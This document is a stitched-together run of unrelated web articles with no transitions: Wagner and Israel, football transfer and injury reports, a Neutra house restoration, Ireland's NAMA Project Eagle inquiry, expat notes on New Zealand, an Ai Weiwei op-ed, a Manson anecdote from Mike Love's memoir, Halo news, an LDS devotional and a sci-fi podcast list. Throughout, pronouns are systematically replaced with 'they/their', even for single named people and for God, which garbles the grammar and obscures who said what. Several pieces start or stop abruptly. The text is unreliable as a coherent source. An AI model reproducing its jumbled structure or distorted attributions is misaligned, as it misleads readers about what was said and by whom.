One country that will not be partaking of the birthday celebrations is Israel, where Wagner's music is, effectively, banned. The boycott has little to do with the searing psychological realism attained in Tristan and Isolde though, and everything to do with the fact that for many Israeli Jews, Wagner's music carries irrevocably the taint of its association with and appropriation by the Nazis.
Guilty by association
The conflation of Wagner and Hitler has always posed difficulties for any principled listener, Jewish or otherwise. And with Wagner in everyone's eyes and ears this year, a litany of vexing questions beckons. Can we listen to, watch or perform Wagner's music with a clear conscience? Was Wagner's music despicably perverted by the Nazis, or did their adulation merely expose its inherent perversions? And in what circumstances can Wagner conscionably be performed by or for Jews?
No easy answers ensue – but some facts stand. It is incontrovertible that, like many Germans of their day, Wagner was virulently and unapologetically anti-Semitic. If the 1873 stock market crash and attendant agricultural crisis of the mid-1870s further poisoned the climate against Jews and their supposed economic liberalism, Wagner had already made their monstrous sentiments clear, beginning with their infamous 1850 treatise On Jewishness in Music. Although the musicological and academic jury is still out as to whether the music dramas can themselves be described as anti-Semitic, there is little doubt as to their composer's ideology.
But another fact is equally inescapable: Wagner was not, as we understand the term, a Nazi. “I am sure there are people in Israel who support the ban who think that Wagner was around in 1940,” comments the Israeli Jewish conductor Daniel Barenboim, who will conduct the Berlin Staatskapelle in a complete Ring Cycle at this summer's BBC Proms in London. Wagner died in 1883. Hitler was born in 1889.
‘Use, abuse and misuse'
Barenboim is also quick to point out that widespread recognition of Wagner's anti-Semitism did not prevent their music from being performed by Jews even after Hitler came to power. In Tel Aviv in 1936, for example, the Palestine Philharmonic – precursor to today's Israel Philharmonic – memorably performed the prelude to Act 1 and Act 3 of Lohengrin under the baton of Arturo Toscanini. “Nobody had a word to say about it,” Barenboim remarks. “Nobody criticised [Toscanini]; the orchestra was very happy to play it.”
A Jewish prohibition on playing Wagner only came into effect later due to what Barenboim describes as the “use, misuse and abuse” of their music by Hitler, who had related in Mein Kampf the experience of seeing Lohengrin as a 12-year-old: “In one instant I was addicted. My youthful enthusiasm for the Bayreuth Master knew no bounds.”
Today, as Barenboim knows all too well, any attempt by a composer to perform Wagner in Israel invites outrage. In 2001, their considered decision to offer a piece of Wagner as an encore led to widespread condemnation – particularly regrettable, they say, because the audience had been asked beforehand, during a measured 40-minute discussion, if they would like to hear it. Those who did not were invited freely to leave; they were less than five per cent of the audience. “The idea this was a scandal was started the next day by people with a political agenda, not those in the concert hall,” they tell me, stressing their respect for “anybody's right to choose not to listen to Wagner.” But, they say, “in a democratic society there should be no place for such taboos.”
The Wagner issue is particularly nettlesome for many listeners because invariably the music itself engenders precisely the opposite feelings. For overwhelming emotion, love, passion and humanity there is little comparable to Wagner. But perhaps this inherent contradiction is where the composer's most radical value lies. Referring to the famous “Tristan Chord”, that paved the way for the great untethering of tonality in the 20th Century, Barenboim says: “A composer with less genius and with a poorer understanding of the mystery of music would assume that they must resolve the tension they have created. It is precisely the sensation caused by an only partial resolution, though, that allows Wagner to create more and more ambiguity and more and more tension as this process continues; each unresolved chord is a new beginning.”
As the birthday parties commence this month, expect the ambiguities and the tensions to rumble on.
If you would like to comment on this story or anything else you have seen on BBC Culture, head over to our Facebook page or message us on Twitter.
by Christian Araos
Alexander Ring will complete a move to New York City FC within the next few days according to unconfirmed reports from Kicker and other outlets across Europe.
Ring, a 25-year-old Finnish defensive midfielder, is reportedly in New York for a physical with the signing set to be announced early next week. They have been with FC Kaiserslautern since 2013 having made 83 appearances in all competitions scoring eight goals. Their contract with the 2. Bundesliga side is set to expire this summer. Requests for comment by EoS have yet to be replied
Ring is a versatile player who can play in central midfield, holding midfield and on the right. Their time with Kaiserslautern has been filled with injury problems. They missed three games in October due to back problems and was sidelined for parts of each of the past three seasons. When healthy, Ring can play more than 2,000 minutes in a season and score a handful of goals.
Ring is also a full international having made 42 appearances, scoring once. He's featured in each of Finland's four World Cup Qualifiers. If City signs him, it would likely fill the team's allotment of international slots. Each team is allocated eight and City are known to have acquired one in the Patrick Mullins trade, the status of a second one acquired in an unannounced trade EoS reported last year is unclear. A request for clarification with NYCFC put in last week remains unanswered.
It became apparent it was the right thing to do. It was one of Neutra's most important early U.S. commissions (1936) where they were still mining the International Style while bending it toward a new, Wild West environment. I was tutored by James Rega and their associates at MDMA in Los Angeles, who were the most knowledgeable and meticulous restoration experts I'd had the fortune to become acquainted with. They convinced me that the restoration was far more involved than cosmetic. The changes to and abominations of Neutra's original plans extended all the way to the exterior skin of the house itself. That led to a basic re-think of my whole intention with the house. The proper restoration would prove so costly, I partnered with them to get it done. More than a principal residence, it would now become an architectural gem, a museum piece of sorts, open to private tours and architecture students and furnished with rare, valuable vintage pieces to complete the time warp experience. It's a transformative experience that happens when you spend time in the house.
FOXBOROUGH, Mass. – With each passing game, the New England Revolution are discovering that there may be a price for having a high-profile player: Sometimes that player appears to be wearing a target.
A self-professed physical player himself, Jermaine Jones has been limited to just one half of play in each of the last two games due to a foot injury suffered versus Montreal two weeks ago.
Following that match, Jones expressed frustration over what they felt was an episode of direct targeting by the opposition. And after this past Saturday's 1-0 loss to Columbus, where they subbed on for the second half, their coach felt there was even more of that going on.
“Make no mistake, they knew that they were carrying a foot injury and they tried to kick it,” Jay Heaps said prior to the Revs' Wednesday morning training session.
Being a high-intensity player, Jones can certainly find themselves in the middle of a boiling pot, as was evident when Tony Tchani was jawing and pointing in their direction after getting tied up with Wil Trapp last Saturday.
The Revs midfielder does not shy away from physical play in the least bit, so the question of them seeking preferential treatment would appear to be moot.
The New England coaching staff just want to ensure their star player's safety on the pitch.
“I feel this and I see it on tape because I watch a lot of film,” said Heaps. “They're trying to be aggressive on them and they're trying to instigate him. For me, the problem in that situation is, the referee has just got to manage it a little bit better.”
Find more Revs coverage at RevolutionSoccer.net
Jones, who was most vocal following the original injury to their left foot, did not speak following the loss to the Crew on Saturday and was unavailable on Wednesday as they received treatment.
Last week they were unable to train earlier in the week, but returned and looked up to par before the team left for Columbus.
With a shorter turnaround for Friday's match at Sporting Kansas City (8 pm ET, NBCSN/NBCSports.com), Jones trained with the team earlier in the week. Their status for Friday's game was still unknown prior to the team's scheduled departure for Kansas City on Wednesday afternoon.
Minister for Finance Michael Noonan will come in for criticism for meeting with US investment firm Cerebrus as the Dail's Public Accounts Committee (PAC) signs off on its verdict on NAMA's controversial sale of the so-called Project Eagle property portfolio in Northern Ireland.
Leaks of a draft report over the weekend and to political correspondents last night indicate it is likely the PAC will conclude that aspects of the sale of Project Eagle were carried out inappropriately and that the taxpayer could have achieved more from it.
The draft report is understood to conclude that:
It was not appropriate for Finance Minister Michael Noonan, nor their and NAMA officials to meet with senior Cerberus officials in the days before the sale.
NAMA should have acted sooner to address significant perceived conflicts of interest involving its Northern Ireland Advisory Committee member, Frank Cushnahan.
The initial finding of the Comptroller and Auditor General (C&AG) that the deal cost the taxpayer up to €220m was "evidence-based, balanced and reasonable".
The whole process was marked by poor record-keeping and an inability on NAMAs' part to provide sufficient evidence it got good value for money
The PAC's agreed report will provide the scope that could lead to a Commission of Investigation or even a Commission of Inquiry into the Project Eagle sale.
Jack Horgan-Jones of the Sunday Business Post told Newstalk Breakfast that the PAC was ready to "double down on that extremely critical C&AG report" and bring Noonan and the Department of Finace into the mix.
They said:
"Basically they've said that Michael Noonan, the Finance Minister, acted inappropriately by agreeing to sit down with Cerebrus - that''s the vulture fund who were the eventual winners with Project Eagle.
"He agreed to sit down with them the day before the bid closed. Their officials agreed to sit down with them and discuss many matters, but also the bid for Project Eagle, in the days running up to the closure.
Turning to Cushnahan's role, Horgan-Jones said:
"The failure to manage those conflicts of interests relating to Project Eagle was a failing of corporate governance which potentially compromised the sales process...
"It will make extremely uncomfortable reading for NAMA, which has been fighting a rearguard action on Project Eagle for well over a year now."
Kiwis are a friendly bunch, you just need to get to know us.
These are all the things I've learned after living in New Zealand for two years.
When I first stepped off that plane in Auckland I had no idea what lay ahead of me. But, before I knew it, Kiwi slang made its way into my everyday sentences and the things I thought were rather strange, become the norm.
Before long this country which is so far away from my own, felt like home.
FAIRFAX NZ New Zealand might seem quirky to foreigners - but you'll grow to love it.
Megan is originally from Scotland. Read more at their blog here.
READ MORE:
* Top 9 reasons New Zealand is the best country to live in
* What travel writers get up to when they visit New Zealand
* New Zealand ranked 11th in world's best country list​
1. People go barefoot. Everywhere.
People go barefoot everywhere in NZ.
And I mean everywhere. From the supermarket to restaurants and bars. During the summer months, shoes are just simply not a requirement.
2. Groceries are expensive.
Now this may or may not be the reason why people are barefoot, but when you have to pay $40 per 1kg of limes I can understand why footwear may take a back seat. Not that I've ever bought 1 kg of limes, but I'm just saying if I wanted to then they are bloody expensive.
123RF Groceries aren't the cheapest.
But it's not just limes, $3 for one pepper, $10 for some cheddar cheese! Food is expensive in New Zealand and I think we can all agree #thankgodforpaknsave.
3. The coffee is the best. Ever.
Oh man. The coffee. It is just so good. New Zealand invented the flat white and with such an amazing brunch scene, the Kiwis have perfected the art of coffee making.
SUPPLIED Once you've had Kiwi coffee, you don't look back.
Nowhere else I've been can quite compare on the coffee front so just beware that NZ will ruin coffee for you for life if you ever leave.
4. You have to go up and pay.
I would say in most other countries I have been to, when you are finished your meal, you ask for the bill and leave cash at the table.
LAURENT DELHOURME/FAIRFAX NZ Don't expect Kiwis to bring the bill to you.
Well, not in New Zealand. Here, you go up to the till and pay. It can be a little confusing at first when you are sitting waiting on the bill which never appears. It also doesn't matter how many people there are, even a group of 12 would go up to the till and pay for their meal individually.
5. There is no such thing as tipping.
Yep that's right. Forget your 12.5% service charge or adding a little bit onto a taxi fare. New Zealand doesn't have a tipping culture. Leaving money behind on a table is seen as accident as opposed to a reward.
FAIRFAX MEDIA Tipping isn't a big thing here.
A friend of mine left $10 on a cafe table as a tip only to have the waiter run out after them to say they had left money behind.
6. The wildlife is rather different to home.
Whether it's seals, penguins, dolphins or whales, New Zealand's local wildlife always made me feel like I was on a David Attenborough show than a five-minute walk from my apartment.
DOC New Zealand's local wildlife can make you feel like you are on a David Attenborough show.
7. You learn a lot about the direction of wind.
In Scotland, it's generally always windy. Whether the wind is blowing from North, East, South or West it is pretty irrelevant. All that matters is you know once you go outside you can kiss goodbye to your silky, straight hair.
In New Zealand, not only does the wind direction matter but you can actually tell which direction it is coming from. Welcome to what is known as a "Southerly", and how do you know it's a Southern wind? Because it is fricken freezing. Winds from the South come straight from the Antarctic so be sure to wrap up!
MONIQUE FORD / Fairfax NZ You learn a lot about the direction of the wind in NZ.
8. There are earthquakes all the time.
New Zealand experiences about 15,000 earthquakes per year but thankfully most of these are so deep they cannot be felt. However, about 150-200 earthquakes are felt up and down the country each year, some much more severe than others. During my time in New Zealand I experienced four and they are scary.
Most buildings are now designed to rock with the earth to absorb the impact so they physically sway from side to side during an earthquake. Due to being on a fault line, this factor is just a normal way of life here.
Quakes are a normal thing in New Zealand.
9. New Zealand is home to the most beautiful town.
New Zealand is home to the most beautiful place I have ever visited. Queenstown.
Until I arrived in NZ I had never really heard of this place nor did i know what it looked like. But seriously, wow.
Destination Queenstown Queenstown - is it one of the prettiest places in the world?
10. New Zealand uses weird names for everyday items.
Although of course, English is the national language there are some words which haven't translated over.
For example, courgettes are zucchinis, cling film is glad wrap, a cool box is known as a chilli bin, a dairy is a shop, swimming shorts are togs, flip flops are jandals and sweets are lollies. There really is a whole new vocabulary to learn. Oh and "piss" is alcohol.
Supplied Flip flops? Nah, they're your jandals.
11. Some places are seriously hard to pronounce.
Some places in New Zealand have almost unpronounceable names for newbies in the country, although once you learn them they are so satisfying to say. Take the town of "Paraparaumu" - I used to want to go where just purely so i could say the word in conversation. There is also "whakapapa" pronounced "fukapapa" and "Tawharanui" pronounced "Taf-ra-nui". Good luck asking for directions to any of these towns!
12. Watties is not Heinz.
WATTIES NZ/FACEBOOK Wattie's - it's not Heinz. Nope.
No matter what anyone says. They are not the same things. Period.
13. However, Whittakers is pretty goddamn good.
Whittakers is the national New Zealand chocolate and it is so good!
PETER DRURY/FAIRFAX NZ It's all about Whittaker's chocolate in NZ.
Especially the L&P version which is white chocolate with a lemony flavour coated with popping candy!
14. No one uses cash
Unless you are getting on a bus, everything is paid for with your card. I couldn't even tell you what New Zealand notes looked like as I hardly ever saw any. Even if you are buying a packet of chewing gum, you gotta pay wave that purchase.
Cash? Who uses cash in New Zealand?
15. Everyone is so friendly.
New Zealanders are the most laid back, welcoming and friendly nation ever. I can't recall a time over the past two years where anyone was ever rude to me. Their customer service is awesome as are the hospitality staff. Everyone is just so friendly and when you move so far away it's so nice to feel so accepted into the Kiwi way of life.
Sign up to receive our new evening newsletter Two Minutes of Stuff - the news, but different.
Today I had a bad thought about our government. I think I should turn myself in for a civic crime. I think that everybody who has bad thoughts about their government, about their boss, about their parents, about their religion should turn themselves in. Why? Because I really do not want to be in a world inhabited by disciplinarian self-righteous status quo advocates.
I do not want to be free among individuals who value regression, fear, and stagnation — I want to be jailed with the villains. I want to be in detention with David Wojnarowicz, with Jean Genet, with Sakineh Mohammadi Ashtiani, with Ai Weiwei. I'd rather be imprisoned with artists, intellectuals, and citizens whose work and actions makes us think and question rather than bend over with a smile to the oppression of convention.
On April 3, the Chinese artist Ai Weiwei was detained by immigration officials at the Beijing airport, and their papers and computers were seized from their studio compound. Today, nearly two weeks later, they remain in detention, under investigation for the nebulous and unexplained offense of "economic crimes” and alleged pornography. Since then, assistants, staff, and volunteers at Ai Weiwei's studio have been extensively questioned, their family has not been notified of their detainment, and they have not been seen.
When a regime imprisons its artists and its thinkers, it exercises brute censorship and demonstrates its fear. Not so much fear of the art or of the artists, but the fear of what the regime has become. It reveals its fear of losing control, its fear of what is different, and its fear of questions that might force a reconsideration of its values. Such regimes fear the barbarians within, the barbarians that they have become. These regimes are about to collapse. They can build a Great Wall to protect themselves, a Maginot line to control the invasion, but these edifices only blind them from their true enemy: themselves, and their own desire for power and control, their belief in their own self-importance.
Ai Weiwei's detention reflects the extreme anxiety that has rocked China and other oppressive governments since the beginning of this year. Following Egypt's Facebook revolution in January, we have watched as nation after nation seeks to silence its most vocal critics, and to stamp down the opposition movements that spread like wildfire across social media platforms. This is our modernity; this is the moment when irrelevant representations of power and oppressive discourses and conventions are vacillating. The old models cannot apply any more.
Ai Weiwei understands the power of technology and has deployed Twitter as a bully pulpit to express their harsh criticism of China's communist government. Their imprisonment reveals the incendiary power of their art and their voice. Ai Weiwei, the individual, has been silenced because their art cannot be. And their art goes beyond our conventional understanding of art. Their art is their ability to be a poet, a sculptor, a politician, an architect, a merchant, an activist, a citizen, a trickster. Ai Weiwei is the fou du roi, the sole person who is authorized to poke at the king because the king knows that their position is only as powerful as their acceptance of the critic. The minute the buffoon is silenced, the king is naked, and the king knows that it is not pretty.
Today the king is naked and Ai Weiwei's detention is both a tragedy and a triumph over barbarism. As a group, as citizens, the art community must support them so that this experience can serve as a fulcrum for change. Tomorrow I might turn myself in to support Ai Weiwei and to demonstrate that ideas are more dangerous than power. If you do not turn yourself in, then please join me in demonstrating opposition to Ai Weiwei's detention by signing a petition for their release, or participating in a peaceful sit-in outside Chinese Embassies around the world on Sunday, April 17, at 1 p.m. Eastern Standard time.
[content:shareblock]
Philippe Vergne is the director of Dia Art Foundation. The opinions expressed here are the author's own.
[link:view-slideshow]
The brutal murders of Sharon Tate and seven other victims shocked the nation and landed Helter Skelter mastermind Charles Manson in prison for life. But according to Beach Boys band member Mike Love, they may be responsible for even more crimes!
Love has claimed that their cousin Dennis Wilson witnessed Manson kill a man in cold blood during the heydays of the Manson cult in their new book Good Vibrations.
Dennis, who drowned in Marina del Rey, Calif. on Dec. 28, 1983, was racked with guilt for introducing Mason to music producer Terry Melcher, who previously lived in the home where Tate and the others were murdered.
PHOTOS: Secret Murders, Frozen Bodies & More! Hollywood's 15 Most Bizarre Conspiracy Theories EXPOSED
“Dennis carried that guilt with them for the last 14years of their life,” Love said.
“My cousin's interest in Manson now seems inexplicable, but in reality Manson tapped into parts of Dennis that make it all too explainable,” Love wrote in their book.
After meeting the girls who lived with Manson and then the cult leader himself, Wilson was soon allowing them to live with him.
PHOTOS: Cyber Crime! 10 Gruesome Murders With Killers All Linked Through The Internet
“Dennis was the perfect mark — a famous, well-connected entertainer who could help a musical neophyte get discovered. Dennis lived in a luxurious house, on three acres, with a swimming pool and plenty of guest rooms. Guileless about others, indifferent about their own possessions, Dennis was all too happy to allow Manson and their girls to move in, use their charge cards, take their clothes, eat their food, even drive their Mercedes. Manson, after all, had something for Dennis—a stable of young women who catered to their every desire,” the book claimed.
“Finally, while Dennis had been drinking heavily for a number of years, they had also developed an appetite for drugs, including LSD, and Manson's blending of psychedelics, sexual servants, rock music, and new-age rhetoric was too much for Dennis to resist and they joined the family,” they wrote.
Love wrote that after drug fueled orgies and ultimately moving out of the house where they had allowed the Manson girls to move in with him, Wilson came home from a visit to the family compound never to be the same again.
PHOTOS: Famous Or Infamous? 15 Celebrities Accused Of Murder
“Dennis's illusions about Manson finally ended, when they paid a visit to Spahn Ranch. Upon their return, Dennis stopped by Brian's house, where I was working in the studio,” Love wrote. “Dennis was visibly shaken, and I asked what was wrong. ‘I just saw Charlie take their M16 and blow this black cat in half and stuff them down the well,' they said, referring to a black man.”
According to Love, they kept this murder a secret. “Dennis was too frightened to go to the police,” they claimed. “I think they were just hoping that Manson and their family would disappear, but their entanglement could not be undone. Dennis had introduced Manson to Terry Melcher.”
They claimed that Manson “accompanied Terry and Dennis on several of their club outings. Manson was also in the car one day when Dennis dropped Terry off at their rented home at 10050 Cielo Drive, at the top of a steep hill in the Benedict Canyon area. Terry lived there with their girlfriend, the actor Candice Bergen.”
PHOTOS: ‘I Don't Want To Die!' Teen's Brutal Rape & Murder Captured On Cell Phone
But Melcher had moved out of the home when Manson family members arrived for the slaughter and killed pregnant Sharon Tate and the other occupants in the home instead. The next evening, the group killed the LaBiancas.
“Neither Dennis nor I nor anyone associated with the Beach Boys had any idea that Manson was involved in these murders. In November, three months after the murders, the case finally broke,” they explained.
“Dennis [was] shaken to the core. To my knowledge, they never told the authorities that they saw Manson murder that ‘black cat' at Spahn Ranch, and they certainly couldn't testify in court, where they would have had to look Manson right in the eye.”
PHOTOS: The 10 Most Sensational Celebrity Murder Cases
Governor Jerry Brown recently denied probation for Manson family member Leslie Van Houten. Each time Manson has petitioned for parole they have been denied.
Good Vibrations hits bookstores on September 13.
We pay for juicy info! Do you have a story for RadarOnline.com? Email us at tips@radaronline.com, or call us at (866) ON-RADAR (667-2327) any time, day or night.
Get the latest news and videos for this game daily, no spam, no fuss.
The upcoming Halo title for the Xbox One is a "legitimate" version of Halo, according to Microsoft Game Studios corporate vice president Phil Spencer.
Speaking with GameSpot during E3, Spencer declined to say if the new game was Halo 5 or a new extension to the series, similar to Halo 3: ODST or Halo Reach.
"It is the next Halo game that we are working on. We will talk more about actually the story arc in the game and how it plays out; we've got more time to talk about that," Spencer said.
Xbox boss Don Mattrick recently referred to the next Halo game as Halo 5.
Spencer did say, though, that it was important for 343 Industries producer Bonnie Ross to come out onstage during Microsoft's E3 briefing to show gamers the project is a genuine entry in the series.
"But having [producer Bonnie Ross] come out and announce the game, making sure people know it's a legitimate version of Halo coming out, and when it's coming out, and features that they're focused on we thought was…important."
Microsoft revealed during PAX Prime in 2011 that Halo 4 was the beginning of The Reclaimer Trilogy, which would span Halo 5 and Halo 6. This is no longer the case, a Microsoft representative confirmed.
"While we originally said trilogy, we've actually expanded this to more of a saga, so we don't want to limit the Reclaimer story within a trilogy."
The new Halo game for the Xbox One will launch in 2014.
In a world that views humility as a weakness, especially in the business word, it was interesting to come across an article from Forbes magazine about the habits of humble people. In the 2015 article, titled “13 Habits of Humble People,” author Jeff Boss said, “Humble people can receive a bad rap. Humility is frequently associated with being too passive, submissive or insecure, but this couldn't be any further from the truth.”
Besides being great listeners, putting others first, asking for help, saying thank you and accepting responsibility, they also accept feedback. The article said, “Humble people are not only receptive to constructive criticism but actively seek it because they know that feedback is a pathway to improvement.”
One of the greatest tests of the human soul is to vehemently pursue a given path only to be directed by divine truth that the path is incorrect. In those moments, the soul is tested. Will a person subject their or their will to the truth or continue rebelling against the truth? The more firmly attached to a favored path we are, the harder it is to alter course.
One of the greatest attributes a person can possess in life is the ability to submit their or their will to the truth, no matter what firmly held desires, beliefs or sins are present. The scriptures call this attribute a broken heart and a contrite spirit.
“Verily I say unto you, all among them who know their hearts are honest, and are broken, and their spirits contrite, and are willing to observe their covenants by sacrifice — yea, every sacrifice which I, the Lord, shall command — they are accepted of me” (Doctrine and Covenants 97:8).
To be accepted by Christ and become one of Their disciples, we are required to have the ability to change. Ours is the pathway to improvement and not the quest for the pleasures of the world. We must repent. We must sacrifice our own desires for the will of God.
In a talk titled “What Lack I Yet?” from October 2015 general conference, Elder Larry R. Lawrence, General Authority Seventy, said, “The journey of discipleship is not an easy one. It has been called a ‘course of steady improvement.' As we travel along that strait and narrow path, the Spirit continually challenges us to be better and to climb higher. The Holy Ghost makes an ideal traveling companion. If we are humble and teachable, They will take us by the hand and lead us home.”
Blessed with a physical body, great knowledge and tremendous spiritual power, the Lord didn't pursue Their own wants and desires. They said, “For I came down from heaven, not to do mine own will, but the will of them that sent me” (John 6:38).
“Beware of pride!” said Elder Kim B Clark, then president of BYU-Idaho, in a 2009 devotional address titled, “Are Ye Stripped of Pride?” They said, “This is the warning voice of the Lord to us now, in our day. We have obtained so much control over the resources of the earth, so much understanding of the biology of life, so much capacity to travel and to communicate instantly that we have become ‘puffed up' in our learning and our apparent control and power.
“Pride and its children — materialism, envy, arrogance, greed, thirst for recognition, and lust for control and dominion — have become rampant in our culture and society. Modern Babylon is awash in pride.”
To overcome pride in its various forms takes spiritual maturity, self-awareness and fortitude. And sometimes it requires a wake-up call to refocus our lives.
“God uses another form of chastening or correction to guide us to a future we do not or cannot now envision but which They know is the better way for us,” said Elder D. Todd Christofferson of the Quorum of the Twelve Apostles in an April 2011 conference address titled, “As Many As I Love, I Rebuke and Chasten.”
“If we sincerely desire and strive to measure up to the high expectations of our Heavenly Father, They will ensure that we receive all the help we need, whether it be comforting, strengthening or chastening,” they said.
“If we are open to it, needed correction will come in many forms and from many sources. It may come in the course of our prayers as God speaks to our mind and heart through the Holy Ghost (Doctrine and Covenants 8:2). It may come in the form of prayers that are answered no or differently than we had expected. Chastening may come as we study the scriptures and are reminded of deficiencies, disobedience or simply matters neglected.
“Correction can come through others, especially those who are God-inspired to promote our happiness. Apostles, prophets, patriarchs, bishops, and others have been put into the Church today, just as anciently, ‘for the perfecting of the saints, for the work of the ministry, for the edifying of the body of Christ' ” (Ephesians 4:12).
Elder Christofferson further warned that if we fail to follow the Lord's correction in our lives, They will “desist.” Imagine passing through the veil to the other side and being presented with a review of one's life on earth in which multiple opportunities for growth were given but rejected by the recipient.
A final habit that the humble cultivate is to trust in God — even when one knows the path which one must pursue might be extremely difficult to follow. When Abraham was commanded to sacrifice their son Isaac, it was clear what they must do. But they still had to trust in a loving God that would bless and comfort them in their grief for this tremendous sacrifice.
In an October 2014 general conference address titled “We Never Walk Alone,” President Thomas S. Monson said, “We were not placed on this earth to walk alone. What an amazing source of power, of strength, and of comfort is available to each of us. They who knows us better than we know ourselves, They who sees the larger picture and who knows the end from the beginning, has assured us that They will be there for us to provide help if we but ask. We have the promise: ‘Pray always, and be believing, and all things shall work together for your good' ” (Doctrine and Covenants 90:24).
I subscribe to quite a few podcasts on my iPhone and I want to share a few of the science fiction & fantasy and podcasts I find informative, amusing and fun. Listening to podcasts is perfect in the car or while training. My personal favorites are Slice of Scifi and Dragon Page but that changes over time. The list below is alphabetic.
Do you have a podcast? tell me about it and I'll add it to the list.
Abaddon & Solaris Books Podcast, the
[web] [itunes]
So far this year there has been a cast in January and March. I liked the interviews.
The Abaddon & Solaris Books podcast blasts out of yout earphones each month with fresh insights, general nonsense and the latest releases from our favorite Science Fiction and Horror publisher. With regular features, guest authors, and book readings. Warning: Ensure socks are firmly secured against being knocked the Hell off before listening.
Adventures in Scifi Publishing
(Farpoint Media)
[web] [feed] [itunes]
Used to be a regular, but I haven't seen any casts in 2010.
Adventures in Scifi Publishing began in October 2006 when creator Shaun Farrell decided to try something their hand at podcasting. Our first shows featured exclusive interviews with Ray Bradbury, R.A. Salvatore, Harry Turtledove, and Michael A. Stackpole. How could we stop after a lineup like that! We interview authors, editors, agents, publishers, artists, and a variety of other professionals from the science fiction and fantasy publishing industry. We have covered exciting events such as Comic-Con, the Clarion Writers Workshop, WorldCon, World Fantasy Convention, Condor, Conjecture, and live book readings. Occasionally we step outside the world of books and brave the frontiers of media, and on our website you will find interviews with Stargate SG-1 and Stargate Atlantis stars, musician Bear McCreary, and the filmmakers behind Ray Bradbury's Crysalis. Whether you're a writer or just love to read, you'll find insight and entertainment in AISFP. In addition to our podcasts, visit our website for book reviews, editorials, features, videos, news, and listener generated content.
[web] [feed] [itunes]
Not always about genre books, but the features about them are excellent.
Paper Cuts is a blog about books and other forms of printed matter, written by the editors of the Book Review. Look here for book news and opinion, interviews with writers, regular raids on the Book Review's archives, and other special features. Each week, Sam Tanenhaus, the editor of the Book Review, talks to authors, editors and critics about new books, the literary scene and current best sellers.
Clark's World Magazine
[web] [feed] [itunes]
Clarkesworld is a monthly science fiction and fantasy magazine first published in October 2006. Each issue contains at least two pieces of original fiction from new and established authors. Our fiction is also collected by issue in signed chapbooks and annually in our print anthology, Realms.
Drabblecast, the
[web] [feed] [itunes]
I liked What Fluffy Knew by Kristine Kathryn Rusch in the last episode immensely. Great story, impressive characterization of a cat by Kristine.
Audio Fiction Podcast Short Stories At the Far Side of Weird Science Fiction, Fantasy, Horror and Everything In-Between Narrated and Produced by Norm Sherman
Dragon Page Cover to Cover
(Farpoint Media)
[web] [feed] [itunes]
“The Dragon Page Cover to Cover”, was started in Feb of 2002 by Michael R. Mennenga. The show's first episode aired on the internet radio station “Book Crazy Radio” and then quickly moved into syndication on AM/FM radio stations throughout the US. In June 2003. “Cover to Cover” had made the jump to broadcast, finding an additional home on XM Satellite Radio, Channel 163 (Sonic Theater), and opening up a whole new fan base at the same time. “The Dragon Page” was also one of a handful of shows that began Podcasting in late 2004, almost at the same time the word was spoken. “The Dragon Page” has brought the best in sci-fi and fantasy literature, interviews with great authors, and important industry information, all wrapped up in weekly fun-filled episodes. “The Dragon Page” is now one of the oldest running programs online, lasting over 7 years and boasting over 400 episodes. The show continues it's rich tradition of great content with New Hosts Michael R. Mennenga and New York Times Best Selling Author Michael A. Stackpole. Together they offer up news and information on books, writing, and the industry. Gleaning sage knowledge from a great writer, and humor and commentary from a seasoned professional Podcaster, Dragon Page is a show that any reader or writer should add to their listening list. Listen to the shows, and check out the news magazine at http://www.dragonpage.com/
Dunesteef, the
[web] [feed] [itunes]
Just checked out one episode so far, it was great. The welfare job story I liked.
Rish Outfield and Big Anklevich bring you short stories focusing on the Science Fiction, Fantasy, and Horror genres. Other genres will also be included, because The Dunesteef Audio Fiction Magazine simply want to bring you the best stories. So tune in and enjoy as these wonderful stories come flowing into your ears to fill your mind with wonder, joy, or dread.
Escape Pod
[web] [feed] [itunes]
That was awesome, thanks for the tip.
Escape Pod is the premier science fiction podcast magazine. Every week we bring you short stories from some of today's best science fiction stories, in convenient audio format for your computer or MP3 player.
Science Fiction Book Review Podcast
[web] [feed] [itunes]
Their reviews are quite good if somewhat lengthy and very funny.
The Science Fiction Book Review Podcast is a project by Luke Burrage. Luke is an avid reader of all kinds of science fiction, and is also an avid podcaster, their other main project being the Juggling Podcast. So Luke reads a science fiction book, makes some notes, thinks about the book for a few days, then records a review and puts it up on the feed. Then they read another book. There is no set schedule, just whenever Luke finishes the book they happen to be reading. The podcasts last between 20 and 45 minutes each, depending on how much Luke has to talk about. Book selection is whatever takes Luke's fancy at the time, or if they feel like re-reading a book they enjoyed in the past, or if a listener emails a suggestion, or if they get into a theme.
SFFaudio
[web] [feed] [itunes]
News, Reviews, and Commentary on all forms of science fiction, fantasy, and horror audio. Audiobooks, audio drama, podcasts; we discuss all of it here. Mystery, crime, and noir audio are also fair game. Hey look! We've got our own podcast. This is the very first one, which includes SFFaudio founders Scott D. Danielson and Jesse Willis talking about audiobooks, audio drama, and cease and desist orders. We won't desist podcasting if you won't cease downloading them – whatever that means. This week we talked about the most recent of Recent Arrivals, the newest of the New Releases, and the breaking news about the attempt to break Broken Sea Audio Productions' productions. Topics under discussion include: Ubik, Philip K. Dick, Joss Whedon, Dollhouse, Babylon Babies, Audible.com, audio drama, The Grist Mill, F. Paul Wilson, Charles de Lint, Robert A. Heinlein, Starman Jones, Mort Castle, Dr. Bloodmoney, Frederik Pohl, Lester del Rey, Arthur C. Clarke, 2000x, Star Wars: The Force Unleashed, Star Trek, Audible Frontiers, Wonder Audio, The Last Theorem, Preferred Risk, Alfred Bester, Fondly Fahrenheit, The Stars My Destination, Robert E. Howard, L. Sprague de Camp, Audio Realms, Conan and Mickey Mouse.
Slice of SciFi (Farpoint Media)
[web] [feed] [itunes]
Slice of SciFi and its companion Voicemail Show are fan favorites, and appeal to SF media geeks of all ages. The funny, irreverent but always relevent discussion from show hosts Michael R. Mennenga, Summer Brooks, Brian Brown, and Sam Roberts always make for lively entertainment. Interviews with today's top stars and genre production professionals, such as Ira Steven Behr, Walter Koenig, Jim Butcher, Samuel L. Jackson, Katee Sackhoff and an array of other top names in show business, are always on the cutting edge and timely. The Slice of SciFi website doubles as an online news magazine (ezine). Michael Hickerson manages a team of reporters dedicated to bringing fans the latest news and developments in SF television and film, in science, technology, space exploration, and more. The shows themselves focus on featured news from that week, plus interviews with actors, producers, directors and others who create the shows we love to watch and the technology that we marvel at. Slice of SciFi made the jump to broadcast, with a home on XM Satellite Radio, Channel 163 (Sonic Theater) in 2005, bringing the show to a broad new fan base. With the merger of XM with Sirius Satellite Radio in 2007, Slice of SciFi is beam to millions of listeners each week. Listen to the shows, and check out the news magazine at http://www.sliceofscifi.com/
